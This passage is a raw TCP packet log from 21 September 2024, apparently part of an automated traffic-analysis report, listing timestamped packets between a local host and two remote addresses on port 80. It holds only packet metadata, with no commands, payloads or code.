                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848304987 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848330021 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848351002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848366022 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848376036 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848387957 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848393917 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848427057 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848545074 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848557949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848567963 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848581076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848596096 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.848623991 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849220037 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849240065 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849251032 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849270105 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849311113 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849344015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849354982 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849364996 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849375010 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849385023 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849427938 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849498034 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849509954 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849519968 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849533081 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849543095 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849574089 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849766970 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849786997 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849827051 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849852085 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.849870920 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.851128101 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.851171970 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.851181030 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.851223946 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879393101 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879417896 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879427910 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879448891 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879478931 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879483938 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879497051 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879508018 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879524946 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879551888 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879585981 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879599094 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879609108 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879621029 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879626036 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879657984 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879698992 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879710913 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879740953 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879777908 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879789114 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879803896 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879815102 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879821062 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879839897 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879861116 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879934072 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879945993 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879971027 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.879986048 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884212971 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884268045 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884318113 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884329081 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884339094 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884368896 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884396076 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884465933 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884476900 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884489059 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884500980 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884505987 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884521961 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884543896 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884568930 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884588003 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884598970 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884612083 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884640932 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884670973 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884685040 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884696007 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884716034 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884753942 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884766102 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884802103 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884814024 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884824038 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884835005 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884845972 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884850979 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884866953 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884885073 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884896040 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884897947 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.884934902 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885220051 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885265112 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885298967 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885341883 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885348082 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885354042 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885385990 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885397911 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885442972 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885454893 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885464907 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885477066 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885487080 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885489941 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885518074 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885531902 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885590076 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885601044 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885611057 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885622978 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885633945 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885637045 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885644913 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885654926 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885674000 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885700941 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885732889 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885745049 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885754108 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885766029 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885776043 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885803938 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885829926 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885842085 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885853052 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885865927 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885874033 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885876894 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885889053 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885900021 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885902882 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885930061 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.885942936 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886183977 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886195898 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886205912 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886240005 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886255026 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886346102 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886358023 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886368036 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886379004 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886390924 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886393070 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886400938 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886411905 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886413097 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886425018 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886437893 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886464119 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886466980 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886475086 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886485100 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886496067 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886507988 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886508942 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886528015 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886553049 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886555910 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886568069 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886578083 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886590004 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886599064 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886625051 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.886648893 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889391899 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889432907 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889440060 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889445066 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889475107 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889487982 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889504910 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889517069 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889527082 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889539957 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889545918 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889569044 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889600039 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889698029 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889708996 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889723063 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889740944 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889769077 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889769077 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889781952 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889794111 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889805079 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889811993 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889816999 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889839888 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889866114 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889893055 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889904976 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889914989 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889925957 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889938116 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889939070 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889950037 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889957905 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.889985085 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890016079 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890043020 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890057087 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890086889 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890103102 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890119076 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890130997 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890165091 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890182018 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890183926 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890196085 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890207052 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890228987 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890259027 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890317917 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890327930 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890338898 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890350103 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890361071 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890388012 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890423059 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890434980 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890444040 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890460968 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890466928 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890471935 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890491009 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890512943 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890516996 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890554905 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890779018 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890796900 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890808105 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890825033 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890855074 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890882015 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890893936 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890925884 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890950918 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890973091 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890985012 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.890995026 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891001940 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891024113 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891035080 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891062975 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891088963 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891100883 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891112089 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891122103 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.891136885 CEST4971180192.168.2.9147.45.44.104
